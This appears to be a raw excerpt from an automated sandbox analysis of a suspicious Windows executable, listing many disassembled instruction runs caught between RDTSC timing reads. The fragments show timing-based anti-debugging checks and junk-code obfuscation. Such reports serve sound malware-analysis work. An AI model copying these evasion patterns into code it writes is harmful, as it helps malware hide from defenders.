Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDB53 second address: 9DDBEA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F1511CE39h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F7F1511CE28h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jmp 00007F7F1511CE38h 0x00000030 push 00000000h 0x00000032 movsx ebx, ax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F7F1511CE28h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D2CE9h], eax 0x00000057 xchg eax, esi 0x00000058 jng 00007F7F1511CE30h 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 pop esi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDD72 second address: 9DDD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFC73 second address: 9DFCAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7F1511CE34h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c or di, 8F74h 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D318Ah] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007F7F1511CE2Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DED05 second address: 9DED09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DEDBC second address: 9DEDC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0BBB second address: 9E0BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Ch 0x00000009 popad 0x0000000a jmp 00007F7F147AEA55h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jnp 00007F7F147AEA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFE78 second address: 9DFE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFE7C second address: 9DFE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFE89 second address: 9DFE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1CEC second address: 9E1CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2C07 second address: 9E2C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2C0B second address: 9E2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2C11 second address: 9E2C61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7F1511CE33h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 461FDFE3h 0x00000013 push 00000000h 0x00000015 mov ebx, edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F7F1511CE28h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3E06 second address: 9E3E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3E28 second address: 9E3E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3E2D second address: 9E3E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4E90 second address: 9E4F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7F1511CE26h 0x00000009 jmp 00007F7F1511CE39h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 xor dword ptr [ebp+122D311Ch], edi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1A81h], ecx 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F7F1511CE28h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov edi, dword ptr [ebp+122D2B23h] 0x00000044 and ebx, dword ptr [ebp+122D18FCh] 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e jo 00007F7F1511CE26h 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4F00 second address: 9E4F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4F0A second address: 9E4F23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jns 00007F7F1511CE26h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1E59 second address: 9E1F22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F147AEA57h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F147AEA48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, eax 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx ebx, si 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+122D28F6h], ecx 0x00000044 mov eax, dword ptr [ebp+122D00D9h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F7F147AEA48h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2AA3h] 0x0000006a push FFFFFFFFh 0x0000006c jmp 00007F7F147AEA4Fh 0x00000071 nop 0x00000072 pushad 0x00000073 jnl 00007F7F147AEA4Ch 0x00000079 jnl 00007F7F147AEA48h 0x0000007f popad 0x00000080 push eax 0x00000081 push ecx 0x00000082 push eax 0x00000083 push edx 0x00000084 jbe 00007F7F147AEA46h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0D94 second address: 9E0D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C8D second address: 9E5C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C91 second address: 9E5C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C95 second address: 9E5CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F7F147AEA48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D28EFh], ecx 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D31C7h], ecx 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5CD2 second address: 9E5CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5ED6 second address: 9E5EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5EEB second address: 9E5EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F1511CE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7DC2 second address: 9E7DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7DC6 second address: 9E7E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7F1511CE33h 0x0000000c jmp 00007F7F1511CE2Dh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push edx 0x00000016 mov bx, di 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F7F1511CE28h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 jl 00007F7F1511CE2Ch 0x0000003c mov dword ptr [ebp+122D35FCh], ebx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007F7F1511CE28h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e mov bh, 25h 0x00000060 mov dword ptr [ebp+122D3124h], edx 0x00000066 xchg eax, esi 0x00000067 pushad 0x00000068 jmp 00007F7F1511CE2Dh 0x0000006d push eax 0x0000006e push edx 0x0000006f ja 00007F7F1511CE26h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7E5A second address: 9E7E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA351 second address: 9EA356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7F8A second address: 9E7F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F7F147AEA48h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E8044 second address: 9E804A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E804A second address: 9E8062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EC9E8 second address: 9EC9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F0BF1 second address: 9F0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F0BF7 second address: 9F0C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F7F1511CE26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F0C06 second address: 9F0C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F058A second address: 9F058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F058E second address: 9F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F147AEA54h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F06F4 second address: 9F06F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98722F second address: 987234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F61CE second address: 9F61D8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F61D8 second address: 9F61DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBD00 second address: 9FBD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBD06 second address: 9FBD10 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FC7F6 second address: 9FC807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FC807 second address: 9FC80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FC80D second address: 9FC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06D7A second address: A06D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7F147AEA46h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA4Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06D95 second address: A06D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06D99 second address: A06DC4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 jnc 00007F7F147AEA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F7F147AEA53h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DC4 second address: A06DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DC8 second address: A06DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DD3 second address: A06DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DD8 second address: A06DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DE9 second address: A06DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05ACE second address: A05AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 jng 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C68 second address: A05C87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7F1511CE2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F7F1511CE26h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C87 second address: A05C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C8D second address: A05C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C91 second address: A05C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C95 second address: A05CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06087 second address: A0608B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0608B second address: A0608F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06202 second address: A0620E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA46h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05797 second address: A057E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE31h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007F7F1511CE32h 0x00000012 jmp 00007F7F1511CE2Ch 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F7F1511CE26h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F7F1511CE31h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A057E1 second address: A057F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A057F3 second address: A057F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1F2D second address: 9D1F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06620 second address: A06635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06A8B second address: A06AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06AA0 second address: A06AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06AB2 second address: A06ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06ABF second address: A06AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B027 second address: A0B044 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F147AEA51h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B333 second address: A0B350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7F1511CE2Dh 0x0000000b jo 00007F7F1511CE26h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B350 second address: A0B356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B356 second address: A0B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F7F1511CE2Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE32h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B380 second address: A0B399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F7F147AEA4Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B399 second address: A0B3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B3A4 second address: A0B3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jo 00007F7F147AEA46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B63C second address: A0B648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
